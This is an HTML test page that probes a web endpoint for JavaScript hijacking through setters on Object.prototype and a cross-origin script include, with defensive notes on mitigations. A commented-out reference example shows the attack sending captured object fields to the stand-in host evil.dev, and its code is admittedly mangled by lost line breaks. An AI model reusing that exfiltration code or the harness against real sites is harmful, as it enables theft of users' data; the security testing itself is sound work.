Testing Javascript hijacking via object overloading.
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
<title>js hijack testing</title>
</head>
<body>
<!--
  Test harness for "JavaScript hijacking": cross-site inclusion of a JSON or
  JSONP response through a script tag. The page installs setters for a
  property named "Id" and then loads a cross-origin response as script. If
  either setter runs, an alert is shown and the text "foo" is written into the
  #obj element below.
-->
<!--
  Reference example, kept disabled for context. It depends on the non-standard
  "prop setter = fn" form and on redefining the global Object constructor.
  NOTE(review): neither is expected to work in current engines; confirm
  against the browsers that have to be covered. The listing lost its line
  breaks, so some of its code now sits on the same line as a // comment.
-->
<!--<script>
// Example:
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field, // this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject; }
// Send the captured object back to the attacker's Web site function captureObject(x) {
var objString = ""; for (fld in this) {
objString += fld + ": " + this[fld] + ", "; }
objString += "markup: " + x;
var req = new XMLHttpRequest(); req.open("GET", "http://evil.dev?obj=" +
escape(objString),true); req.send(null);
}
</script>-->
<script>
// Assigned without var/let, so in this non-strict inline script it becomes a
// global. It wraps its argument with new Object(obj) and discards the result.
// Nothing on this page calls it.
foo = function(obj) {
obj = new Object(obj);
}
// Setter for "Id" on Object.prototype, installed with the legacy
// __defineSetter__ API. It runs when code assigns o.Id = value on an object
// that has no own "Id" property. The assigned value arrives as `obj` and is
// ignored; the only visible effects are the alert and the constant text
// written into #obj.
// Caveat when reading results: ES5-conformant engines create object-literal
// properties such as {"Id": 1} as own data properties without consulting
// inherited setters, so a quiet run in a current browser does not show that
// the endpoint is safe for older clients.
Object.prototype.__defineSetter__('Id', function(obj){
alert('foo');
document.getElementById('obj').innerHTML = 'foo';
});
// Same handler installed on the Object constructor function itself, so only
// assignments to Object.Id reach it.
// NOTE(review): presumably a second probe variant; confirm intent.
Object .__defineSetter__('Id', function(obj){
alert('foo');
document.getElementById('obj').innerHTML = 'foo';
});
</script>
<div id="obj"></div>
<!-- Use this script tag to bring in victim's data. -->
<!--
  Defensive notes for the endpoint under test: a script include is a
  cross-site GET that can carry the user's cookies (subject to SameSite), and
  the response executes in this page's context. Endpoints that return per-user
  data should not be servable as script: require a CSRF token or a custom
  request header, answer with Content-Type application/json together with
  X-Content-Type-Options: nosniff, set SameSite on session cookies, and avoid
  JSONP for authenticated data.
  example.com is a placeholder URL and is fetched over plain http here.
-->
<script src="http://example.com/?callback=jsonp"></script>
</body>
</html>